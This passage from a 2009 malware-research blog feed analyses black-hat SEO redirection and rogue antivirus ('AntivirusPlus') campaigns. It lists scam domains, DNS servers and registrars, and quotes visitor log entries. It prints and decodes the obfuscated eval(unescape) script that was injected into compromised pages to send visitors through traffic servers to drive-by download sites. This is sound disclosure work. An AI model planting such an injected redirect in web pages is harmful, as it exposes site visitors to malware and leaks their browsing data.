href="http://wepawet.iseclab.org/view.php?hash=6277c30fcb40c1550e3b48cc6033b661&t=1239259541&type=js" target="_blank">Redirection Analysis</a><br />On April 8: google.com <br /> On April 9: lite6scan.com - <a href="http://wepawet.iseclab.org/view.php?hash=75b212b2737a3f1567a109552ef9358a&t=1239312379&type=js" target="_blank">Redirection Analysis </a><br /><br /><hr /> </p><br />Let's show the second domain:<br /><br /><table width="202" height="48" border="1" cellpadding="0" cellspacing="0"><tr><td width="198" height="46" style="padding:15px">home.no/kjveubjh/</td></tr></table><br />Malicious script inserted. (after the body)<br /><br /><table width="490" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="486" height="61" style="padding:15px"><script language="JavaScript"><br />eval(unescape('%70%61%72%65%6E%74%<br />2E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%<br />2E%72%65%70%6C%61%63%65%28%22%68%74%74%70%3A%2F%<br />2F%64%64%6F%72%73%2E%69%6E%66%6F%2F%69%6E%2E%63%<br />67%69%3F%31%31%26%6B%65%79%77%6F%72%64%3D%67%61%<br />72%61%67%65%62%61%6E%64%2B%68%61%72%64%2B%72%6F%<br />63%6B%2B%67%75%69%74%61%72%2B%61%70%70%6C%65%2B%<br />6C%6F%6F%70%73%26%73%65%6F%72%65%66%3D%22%2B%65%<br />6E%63%6F%64%65%55%52%49%43%6F%6D%70%6F%6E%65%6E%<br />74%28%64%6F%63%75%6D%65%6E%74%2E%72%65%66%65%72%<br />72%65%72%29%2B%22%26%22%2B%22%70%61%72%61%6D%65%<br />74%65%72%3D%24%6B%65%79%77%6F%72%64%26%6B%65%79%<br />77%6F%72%64%3D%24%6B%65%79%77%6F%72%64%26%73%65%<br />3D%24%73%65%26%75%72%3D%31%26%48%54%54%50%5F%52%<br />45%46%45%52%45%52%3D%22%2B%65%6E%63%6F%64%65%55%<br />52%49%43%6F%6D%70%6F%6E%65%6E%74%28%64%6F%63%75%<br />6D%65%6E%74%2E%55%52%4C%29%29'))<br /></script></td></tr></table><p>then force the browser to be redirected to another traffic management server<br /></p><table width="409" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="405" height="61" style="padding:15px">parent.window.location.replace("http://ddors.info/in.cgi?11&keyword=<br />garageband+hard+rock+guitar+apple+loops&seoref="<br />+encodeURIComponent(document.referrer)+"&"+<br />"parameter=$keyword&keyword=$keyword&se=$se&ur=1<br />&HTTP_REFERER="+encodeURIComponent(document.URL))</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=b5e1b4dfe085fdd8dd08aaddd70cac93&t=1239112269&type=js" target="_blank">Result here</a><br /> then redirect to a domain (drive-by-download) which chose the next redirection<br /></p><table width="423" height="48" border="1" cellpadding="0" cellspacing="0"><tr><td width="419" height="46" style="padding:15px">ddors.info to "goscandata.com" to "scanany6.com"</td></tr></table><br />Note that during the redirection the "traffic management server" is informed of your IP, <br />the site which served for redirection "the compromised website".<br /><br /> Interesting is that the site serving for the first redirection is cited in <a href="http://www.malwaredomainlist.com/mdl.php?search=ddors.info" target="_blank">Malware Domain List</a> <br /> since May 2008! for hosting a zlob variant. <br /><br /> *******<br /><br /> What we've found on the server is that:<br /><br /><table width="426" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="422" height="61" style="padding:15px">1 1 0 0 0 0 0 0 US en-us 65.55.165.94 http%3A%2F%2Ftiti%2Eiax%<br />2Ebe%2Fdiagnostic%2Dteaching%2Dof%2Dreading%2Dand%2Djour<br />nal%2Darticles%2Ehtml%3Ffeed%3Dcomments%2Drss2 articles live%<br />2Ecom Mozilla%2F4%2E0+%28compatible%3B+MSIE+6%2E0%3B+<br />Windows+NT+5%2E2%3B1 1 0 0 1 1 1 0 GB en-gb 86.147.111.244<br />http%3A%2F%2Fhome%2Eno%2Fchuka%2Fwicapeadea%2Ehtml<br />wickapeadea yahoo Mozilla%2F4%2E0+%28compatible%3B+<br />MSIE+7%2E0%3B+Windows+NT+5%2E1%3B1 1 0 0 1 1 1 0 US <br />en-us 72.11.87.126 http%3A%2F%2Ftiti%2Eiax%2Ebe%2Faia%<br />2Dbilling%2Dform%2Ehtml aia+billing+form msn Mozilla%2F4%2E0<br />+%28compatible%3B+MSIE+7%2E0%3B+Windows+NT+5%2E1%3B<br /></td></tr></table><p><br /> The visitor IP (country), browser version/language and the site you are coming from which is the compromised website.<br /><br /> I will not published the entire log because a LOT of compromised web site is cited.<br /> (We also have logs from other server - in MB which include thousand of compromised website.) <br /><br /> This is some of them:<br /></p><table width="409" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="405" height="61" style="padding:15px">1 1 0 0 0 0 0 0 <br />US en-us 65.55.165.94 <br />hxxp://titi.iax.be/diagnostic-teaching-of-reading-and-journal-articles.html?feed=comments-rss2<br />Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2;) <br /><a href="http://wepawet.iseclab.org/view.php?hash=7b65f635713daef7ab6d96a4b1b5252f&t=1239112857&type=js" target="_blank">Redirection Analysis</a> <br /><br />1 1 0 0 1 1 1 0 <br />GB en-gb 86.147.111.244<br />hxxp://home.no/chuka/wicapeadea.html<br />Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)<br /><a href="http://wepawet.iseclab.org/view.php?hash=309ecbd6585d5312b71e000faff62ca0&t=1239115142&type=js" target="_blank">Redirection Analysis</a> <br /><br />1 1 0 0 1 1 1 0 <br />US en-us 72.11.87.126<br />hxxp://titi.iax.be/aia-billing-form.html<br />Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)<br /><a href="http://wepawet.iseclab.org/view.php?hash=68f7e099e33a29e4512ea455e73bfaf7&t=1239114945&type=js" target="_blank">Redirection Analysis</a><br /><br /> 4 1 1 0 0 0 0 0 <br />FR en-us 193.47.80.77<br />hxxp://mitglied.lycos.de/gbk6ntkbn/usda-maps-mn.html<br />keyword for traffic: usda maps mn<br /><a href="http://wepawet.iseclab.org/view.php?hash=c6c7901b91f89e3c7b0fce27acab32ac&t=1239114403&type=js" target="_blank">Redirection Analysis </a><br /><br /> 4 1 1 0 0 0 0 0 US <br /> en-us 204.62.53.124<br />hxxp://members.lycos.co.uk/dkd1nfkdf/voodoo-glow-skulls-guitar-tabs.html <br />keyword for traffic: voodoo glow skulls guitar tabs <br /><a href="http://wepawet.iseclab.org/view.php?hash=1b614f1201d8167c987ff2d4634276e2&t=1239114957&type=js" target="_blank">Redirection Analysis </a> <br /><br /> 4 1 0 0 0 0 0 0 IE <br /> en-us 78.137.163.133<br /> hxxp://usuarios.lycos.es/utrinopok/remove-hair-dye-stains.html <br /> keyword for traffic: remove hair dye stains <br /><a href="http://wepawet.iseclab.org/view.php?hash=c001a486d89b53856295b0ef12d59fd3&t=1239114967&type=js" target="_blank">Redirection Analysis </a> <br /><br />4 1 0 0 1 1 1 0 US <br />en-us 71.235.179.148 <br />http://members.lycos.nl/eu40wyhk/presentation-tools-for-excel-highlighting.html <br />keyword for traffic: presentation tools for excel highlighting<br /><a href="http://wepawet.iseclab.org/view.php?hash=1b614f1201d8167c987ff2d4634276e2&t=1239114957&type=js" target="_blank">Redirection Analysis </a> <br /><br /></td></tr></table></td></tr><tr><td> </td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-50240488283852173092009-04-04T23:02:00.000-07:002009-04-06T07:15:32.345-07:00Rogueware AntivirusPlus - thegreatsecurity.com<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="518" height="626" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr>
<td colspan="2" valign="top" height="561"><span style="font-size:14px; font-weight:bold">Rogueware AntivirusPlus - thegreatsecurity.com, todaybestscan.com</span><br /><br />Another list of malicious domain promoting rogue software associated with "AntivirusPlus"<br /><br /><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"> <tr> <td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus">THIS page</a> if you need more information<br /></td></tr></table><br /><hr /><span class="scam_website">easyincomeprotection.cn</span> (Also have 6 different template)<br /><span class="scam_website">bigdefense2u.cn</span><br /><span class="scam_website">easydefenseonline.cn</span> <br /><span class="scam_website">easyincomeprotection.cn</span> <br /><span class="scam_website">easypersonalprotection.cn</span><br /><span class="scam_website">examineillnesslive.cn</span><br /><span class="scam_website">freedefenseforyou.cn</span><br /><span class="scam_website">mycheckdiseasepro.cn</span><br /><span class="scam_website">mycheckdiseasestore.cn</span><br /><span class="scam_website">mydefense4u.cn</span><br /><span class="scam_website">mydefense4you.cn</span><br /><span class="scam_website">myguardforyou.cn</span><br /><span class="scam_website">newguard4u.cn</span><br /><span class="scam_website">newguard4you.cn</span><br /><span class="scam_website">refugepro.cn</span><br /><span class="scam_website">yourguard4you.cn</span><br /><span class="scam_website">yourguardforyou.cn</span><br /><span class="scam_website">yourguardonline.cn</span><br /><span class="scam_website">yourguardpro.cn </span><br /><br /><a href="http://anubis.iseclab.org/?action=result&task_id=190fc55b62d92d7e4c5f530e56ace2255&format=html">Anubis</a> - <a href="http://www.virustotal.com/analisis/3ad454086dcaf5b39567c1eda21943b5" target="_blank">VirusTotal</a> <br /><br /> Created 30-mar-2009 <br /><br /> Registered with "广东时代互联科技有限公司" translated into english the result beeing:<br /><br />"Time Internet Technology Co., Ltd. Guangdong" also cited as registrar for hosting SCAM websites here<br /><br /><a href="http://www.bobbear.co.uk/DDK-Group-Inc.html" target="_blank">DDK-Group-Inc.</a><br /><a href="http://www.bobbear.co.uk/EFS-Capital-Group-Inc.html" target="_blank">EFS-Capital-Group-Inc</a><br /><a href="http://www.bobbear.co.uk/tdk-group-inc.html" target="_blank">tdk-group-inc</a> <br /><a href="http://www.bobbear.co.uk/e-innovative-inc.html" target="_blank">e-innovative-inc </a><br /><br />DNS: <br /><br /><span class="scam_website">ns1.pubilcnameserver7.com</span> [94.247.2.215]<br /><span class="scam_website">ns2.pubilcnameserver7.com</span> [94.247.2.216]<br /><br /> Using the same DNS we have:<br /> <br /> <span class="scam_website">easyaddedantivirus.com</span> [94.247.2.215]<br /> <span class="scam_website">yourcountedantivirus.com</span> [94.247.2.215]<br /><br />Created 30-mar-2009 <br /><br />Registrar used: BIZCN.COM, INC.<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM28E7RcpWm4tCmLjj2RzEJRz_MavHEaSb_s1sstjSOCrIbEIfApc9HW_2XPiAXR6EyQ0FWTFSh3tSbV58M-BZeQ-CktYnr8zmmAz1oqt7svDp6e4mIANVN0521tNnAIoJau0Of5Vu9WSn/s1600-h/antivirus-plus-new.com.jpg"><img style="cursor:pointer; cursor:hand;width: 205px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM28E7RcpWm4tCmLjj2RzEJRz_MavHEaSb_s1sstjSOCrIbEIfApc9HW_2XPiAXR6EyQ0FWTFSh3tSbV58M-BZeQ-CktYnr8zmmAz1oqt7svDp6e4mIANVN0521tNnAIoJau0Of5Vu9WSn/s320/antivirus-plus-new.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_" /></a> <br /><br />Application screenshot (Alias: FakePlus)<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHWcKQIwtwBvti53XNPQIby7cbKR0XutupaoYNchy28IRcI_ZaqDXH4-yaMJpJclSrTskBflQZpMOJIxh8V2QHIRyxNuoAaJPDXVk95u6TJgYrpz4JAzfelslnuM505znTvjH7-Fsy6bJb/s1600-h/AntivirusPlusSetup2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 250px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHWcKQIwtwBvti53XNPQIby7cbKR0XutupaoYNchy28IRcI_ZaqDXH4-yaMJpJclSrTskBflQZpMOJIxh8V2QHIRyxNuoAaJPDXVk95u6TJgYrpz4JAzfelslnuM505znTvjH7-Fsy6bJb/s320/AntivirusPlusSetup2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321056722953046562" /></a><br /><br /><hr /><span class="scam_website">topsoftscanner.com</span> [209.44.126.14]<br /><br />Created 25-mar-2009<br /><br />No whois info - PrivacyProtect.org <br />Registrar used: DIRECTI INTERNET SOLUTIONS PVT. LTD<br /><br /><span class="scam_website">thegreatsecurity.com</span> [209.44.126.14]<br /><br />hxxp://golkis.dnip.net/online-j49/yornt.html<br /><a href="http://wepawet.iseclab.org/view.php?hash=877ac4d842b4d77d426ff3b8eb93694d&t=1238846260&type=js" target="_blank">Javascrit Analysis</a> by Wepawet<br /><br />Seen on Alexa<br /> "The Google cache has been updated and the link has been removed."<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi32gdrbRFHzIXJDqN58oV_dyqfc2-pIG1ombrQH6KsGIPmaTV57vgp0JuJdwLy3Y9AhnTKkkhTiJake991xR796M62pFC5UQRYQlwVKsdeVnOURGy6YyABgO9x9_Zj33_uXaujw6cEudBB/s1600-h/thegreatsecurity.com.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 44px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi32gdrbRFHzIXJDqN58oV_dyqfc2-pIG1ombrQH6KsGIPmaTV57vgp0JuJdwLy3Y9AhnTKkkhTiJake991xR796M62pFC5UQRYQlwVKsdeVnOURGy6YyABgO9x9_Zj33_uXaujw6cEudBB/s320/thegreatsecurity.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320970804667840450" /></a><br /><br /> Created 03-apr-2009 <br /><br /> No whois info - PrivacyProtect.org <br />Registrar used: DIRECTI INTERNET SOLUTIONS PVT. LTD <br /><br /><span class="scam_website">checkonlinesecurity.com</span> [209.44.126.14]<br /><br />Created 05-apr-2009<br /><br />No whois info - PrivacyProtect.org <br />Registrar used: DIRECTI INTERNET SOLUTIONS PVT. LTD <br /><br /><span class="scam_website">todaybestscan.com</span> [209.44.126.14]<br /><br />Created 05-apr-2009<br /><br />No whois info - PrivacyProtect.org <br />Registrar used: DIRECTI INTERNET SOLUTIONS PVT. LTD <br /><br /> Using these two DNS: <br /><br /><u>ns1.fuckmoneycash.com</u> [209.44.126.15]<br /><u>ns2.fuckmoneycash.com</u> [209.44.126.16] <br /><br /> Title: <i>My computer Online Scan</i><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE7qILWfFe3bbSB6g1cW5mU388TZ39gTs_VKfDlzqoLpkZcrybtyGnQDz0AUlHHYl9GgDjtnJEfcy_24KG2v-2T73X6guy6slOxUSHwICqn-4tfqXVPsYvMLI4kkSZwkwZRSiBFE6QUgSp/s1600-h/thegreatsecurity.com.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 250px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE7qILWfFe3bbSB6g1cW5mU388TZ39gTs_VKfDlzqoLpkZcrybtyGnQDz0AUlHHYl9GgDjtnJEfcy_24KG2v-2T73X6guy6slOxUSHwICqn-4tfqXVPsYvMLI4kkSZwkwZRSiBFE6QUgSp/s320/thegreatsecurity.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320867043546382258" /></a><br /><br /><br /><br /><br /><br /></td></tr><tr> <td height="25" colspan="2" valign="top" style="background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Mys96Pf0dtW1L7tKUiFWVVVD1ZmHLx3eZ8LXnpIEUioqMsXimIo-2wzIHbVQoKA5oDFpi1Ho5X-yiMzg8ESOj6iSKcCIdGbzEFyXa2U2q2aPFfq25hseA5fHGQH7RleVNGiNAtOWDFkt/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Template used:</b></td></tr><tr><td width="27" height="40"> </td><td width="491"><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsAmXE3LgtKf89Yrjy7zEpRNRaHup0WVg1XM9z6iA0XeI4aCZjfdBWzS5Wen7mWcR3n6qu1zhaC7XA918odaH2qvNwr7a0v11p9VM__JZ9z6UY943AcWiSc2QdNJr5uEBQBja8cQYQfBke/s1600-h/easyincomeprotection.cn-SCAM-AntivirusPlus-2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 280px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsAmXE3LgtKf89Yrjy7zEpRNRaHup0WVg1XM9z6iA0XeI4aCZjfdBWzS5Wen7mWcR3n6qu1zhaC7XA918odaH2qvNwr7a0v11p9VM__JZ9z6UY943AcWiSc2QdNJr5uEBQBja8cQYQfBke/s320/easyincomeprotection.cn-SCAM-AntivirusPlus-2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321024863702689394" /></a> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxIZ5Cww3V2I_Lzg3uYYfsD7nAqeKE_8uBhdJk5IT8oadpnu12SHSlmRHn_AF5Evp3Y-jO2WMhxw4wJ8RPXOXDPoWehAeKwvoeQdBOw5nUKVW8GUqG2AcokumAyUInz5o2iw1QCSzW8iXn/s1600-h/easyincomeprotection.cn-SCAM-AntivirusPlus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 270px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxIZ5Cww3V2I_Lzg3uYYfsD7nAqeKE_8uBhdJk5IT8oadpnu12SHSlmRHn_AF5Evp3Y-jO2WMhxw4wJ8RPXOXDPoWehAeKwvoeQdBOw5nUKVW8GUqG2AcokumAyUInz5o2iw1QCSzW8iXn/s320/easyincomeprotection.cn-SCAM-AntivirusPlus.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321024863888484722" /></a> <br /><a rel="dofollow" target="_blank" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjYzw8v0QHihmhfMVrmoguKyKu_ZN3IsfXrUkNKPltSAAuyi5LKrozS0WVocIFvfv1bf2xkRK0fDBstt3VGLjOtwoCzF2iQxvHlBKmz37d35z9SI2Z9Xg0Gt9IwYmPwnvLtTixLC2QC7e7/s1600-h/onlinewebscan1-AntivirusPlus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 276px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjYzw8v0QHihmhfMVrmoguKyKu_ZN3IsfXrUkNKPltSAAuyi5LKrozS0WVocIFvfv1bf2xkRK0fDBstt3VGLjOtwoCzF2iQxvHlBKmz37d35z9SI2Z9Xg0Gt9IwYmPwnvLtTixLC2QC7e7/s320/onlinewebscan1-AntivirusPlus.jpg" border="0" alt="Template AntivirusPlus from onlinescanweb.com" id="BLOGGER_PHOTO_ID_5313595059535344802" /></a><a rel="dofollow" target="_blank" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoCVP87tvU_gaHKo72IQwWMeq1ViawWnkaMwcxExxH1XRvyJyOCBVUGp4Gv5gAxT83VRAyST0G6WfkEj1NqQ4wqK-84YzzdBlZ73LqPSrDQi1RbLdKdr8DeOj9q-Os0l3UeDd_wS3ymsXm/s1600-h/onlinewebscan-AntivirusPlus.jpg"><br /><img style="cursor:pointer; cursor:hand;width: 320px; height: 242px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoCVP87tvU_gaHKo72IQwWMeq1ViawWnkaMwcxExxH1XRvyJyOCBVUGp4Gv5gAxT83VRAyST0G6WfkEj1NqQ4wqK-84YzzdBlZ73LqPSrDQi1RbLdKdr8DeOj9q-Os0l3UeDd_wS3ymsXm/s320/onlinewebscan-AntivirusPlus.jpg" border="0" alt="Template AntivirusPlus from onlinescanweb.com" id="BLOGGER_PHOTO_ID_5313595700040726258" /></a><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg8VQqNL0sX3PNQ-APRwv44dmpM4sdiFImdnITmqv8UnNfGNicwrLBQWUe9wohLt-RKCcFoR2j7hurgfP-wMD7m8eXDIrM30TCEBJk6GQ_44kYOKcE-dsp0VchSHzTwKjXntK2AezTUkQn/s1600-h/onlinewebscan1-AntivirusPlus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 276px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg8VQqNL0sX3PNQ-APRwv44dmpM4sdiFImdnITmqv8UnNfGNicwrLBQWUe9wohLt-RKCcFoR2j7hurgfP-wMD7m8eXDIrM30TCEBJk6GQ_44kYOKcE-dsp0VchSHzTwKjXntK2AezTUkQn/s320/onlinewebscan1-AntivirusPlus.jpg" border="0" alt="onlinewebscan.com AntivirusPlus Template 1"id="BLOGGER_PHOTO_ID_5313598311944071714" /></a> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj22Vw7OWvsHpmfqKw9GPr1DSXr1o-76QMXkrwO5xnGf_HtDvrDmd6n97t5ugV8eSJIkaqyXZh9oSFOIKsOs8pZZ9-wUJ8ZgWPZz1xpP8CyHpWCPMmkjMg0FAumDiqV7M90nE1v34J1FZWZ/s1600-h/onlinewebscan-AntivirusPlus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 242px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj22Vw7OWvsHpmfqKw9GPr1DSXr1o-76QMXkrwO5xnGf_HtDvrDmd6n97t5ugV8eSJIkaqyXZh9oSFOIKsOs8pZZ9-wUJ8ZgWPZz1xpP8CyHpWCPMmkjMg0FAumDiqV7M90nE1v34J1FZWZ/s320/onlinewebscan-AntivirusPlus.jpg" border="0" alt="onlinewebscan.com AntivirusPlus Template 1 bis"id="BLOGGER_PHOTO_ID_5313598312165816114" /></a><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie79R50CipEG7_cQAONvL39tsMM2TMCLZgfFQUdk-uoRgj5cgHFjgszFUDu34Itakx9jM-WYoj7I9h5TsnBsquwEi5GRwWzdlXWrtVFIT4HdHeAhQ9UapOS3IQkJA_dtq7U1T0uRSxUdhY/s1600-h/onlinescanweb.com-intro-RapidAntivirus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 282px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie79R50CipEG7_cQAONvL39tsMM2TMCLZgfFQUdk-uoRgj5cgHFjgszFUDu34Itakx9jM-WYoj7I9h5TsnBsquwEi5GRwWzdlXWrtVFIT4HdHeAhQ9UapOS3IQkJA_dtq7U1T0uRSxUdhY/s320/onlinescanweb.com-intro-RapidAntivirus.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 1"id="BLOGGER_PHOTO_ID_5313599119170794226" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgum0_f401foDyaP56ByemwaDeODOw2o7RngatAZ2rCeoGMTht-BJkXEaV1tBfUzrAUIFFylvewx8wu-WchKyVeOAGTquiNEDsCS78oFOa_52u8wQX-IjALkwBJm9o1FUbnwPAvoIW5J1NM/s1600-h/onlinescanweb.com-RapidAntivirus.jpg"><br /><img style="cursor:pointer; cursor:hand;width: 320px; height: 243px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgum0_f401foDyaP56ByemwaDeODOw2o7RngatAZ2rCeoGMTht-BJkXEaV1tBfUzrAUIFFylvewx8wu-WchKyVeOAGTquiNEDsCS78oFOa_52u8wQX-IjALkwBJm9o1FUbnwPAvoIW5J1NM/s320/onlinescanweb.com-RapidAntivirus.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 1 bis"id="BLOGGER_PHOTO_ID_5313599119152255954" /></a><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRDJPdd6-DauW26x5x9yVvg_4pNJYVp3vC6JuZcI_FFZldOAg3FsDgEnen9rH6FYitk4xF7O0iwv6g38cUjUKM3TPUj9piw6-XjBCKcyhb1h_SGwpp-sT8aY5Gg7YuROPObUiEIFnu7bKk/s1600-h/onlinescanweb.comRapidAntivirusTemplate.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 233px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRDJPdd6-DauW26x5x9yVvg_4pNJYVp3vC6JuZcI_FFZldOAg3FsDgEnen9rH6FYitk4xF7O0iwv6g38cUjUKM3TPUj9piw6-XjBCKcyhb1h_SGwpp-sT8aY5Gg7YuROPObUiEIFnu7bKk/s320/onlinescanweb.comRapidAntivirusTemplate.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 2"id="BLOGGER_PHOTO_ID_5313600207261994738" /></a><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP_YBqx0PV5903CT0-ZgRNJURWgXdA11f5cII8YvPnZAEK8aYlH-fxsH6kUNm9mMUHamZ3RIwc5LU4IKn9wgYbCyP3WUGcKYK5R-hl_24CeKQlTKx3za6Bv2-9bDUh-PazYXiw8HcAEv4-/s1600-h/onlinescanweb.com-RapidAntivirusTemplate3.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 275px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP_YBqx0PV5903CT0-ZgRNJURWgXdA11f5cII8YvPnZAEK8aYlH-fxsH6kUNm9mMUHamZ3RIwc5LU4IKn9wgYbCyP3WUGcKYK5R-hl_24CeKQlTKx3za6Bv2-9bDUh-PazYXiw8HcAEv4-/s320/onlinescanweb.com-RapidAntivirusTemplate3.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 3"id="BLOGGER_PHOTO_ID_5313601213075256674" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOXk4FNeDs26DjNr7wZRjiFJ7V1cFkBDQ7t-ACfEUJAuqSj-qUuqBsCb5oRluq9_IN6Ikb3hmm3F-HsXZXe_pLHheoEKA7hkBH-FWc_ztWN9KNBCWJ09qZWX6RgpIQPIv8gTuWh7eFizWJ/s1600-h/onlinescanweb.com-RapidAntivirusTemplate3bis.jpg"><br /><img style="cursor:pointer; cursor:hand;width: 320px; height: 260px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOXk4FNeDs26DjNr7wZRjiFJ7V1cFkBDQ7t-ACfEUJAuqSj-qUuqBsCb5oRluq9_IN6Ikb3hmm3F-HsXZXe_pLHheoEKA7hkBH-FWc_ztWN9KNBCWJ09qZWX6RgpIQPIv8gTuWh7eFizWJ/s320/onlinescanweb.com-RapidAntivirusTemplate3bis.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 3 bis"id="BLOGGER_PHOTO_ID_5313601220254183170" /></a><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOM6z3QwsPCZLnJCQSYvh-txpPARzZt1cj37JSvlFPUo4g2dI9vFTLJ90sIy0DnF_fVH-jUH8jYCCQeQ-CD8TsziIYEO87T8A8gHLg0pqjoXTOJU_K-gdMqJvAnWjsWh1hM6WWTRHpTVF-/s1600-h/onlinescanweb.com-AntivirusPlus_Template2.jpg"><img style="cursor:pointer; cursor:hand;width: 314px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOM6z3QwsPCZLnJCQSYvh-txpPARzZt1cj37JSvlFPUo4g2dI9vFTLJ90sIy0DnF_fVH-jUH8jYCCQeQ-CD8TsziIYEO87T8A8gHLg0pqjoXTOJU_K-gdMqJvAnWjsWh1hM6WWTRHpTVF-/s320/onlinescanweb.com-AntivirusPlus_Template2.jpg" border="0" alt="onlinewebscan.com AntivirusPlus Template"id="BLOGGER_PHOTO_ID_5313602213458773058" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYX677PaFLDjfldeF0eM8_z5TTCLTDZze9hueYXMmOoeHvj0anX5vBIBE6z230YSIaDj3B3AEmdJtxkHfrLyBnkDE5GPNZWI5PC4k_ndHmXvjrbO80rWjKiWHM4JGEREGqCbAXlOME2isM/s1600-h/onlinescanweb.com-AntivirusPlus_Template2bis.jpg"><br /><img style="cursor:pointer; cursor:hand;width: 320px; height: 255px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYX677PaFLDjfldeF0eM8_z5TTCLTDZze9hueYXMmOoeHvj0anX5vBIBE6z230YSIaDj3B3AEmdJtxkHfrLyBnkDE5GPNZWI5PC4k_ndHmXvjrbO80rWjKiWHM4JGEREGqCbAXlOME2isM/s320/onlinescanweb.com-AntivirusPlus_Template2bis.jpg" border="0" alt="onlinewebscan.com AntivirusPlus Template 2"id="BLOGGER_PHOTO_ID_5313602211653738594" /></a><br /><br /></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-72513060435326274242009-04-04T22:57:00.000-07:002009-04-04T23:03:29.801-07:00tubeloyaln.com Fake Codec and RogueAV Revisited<div 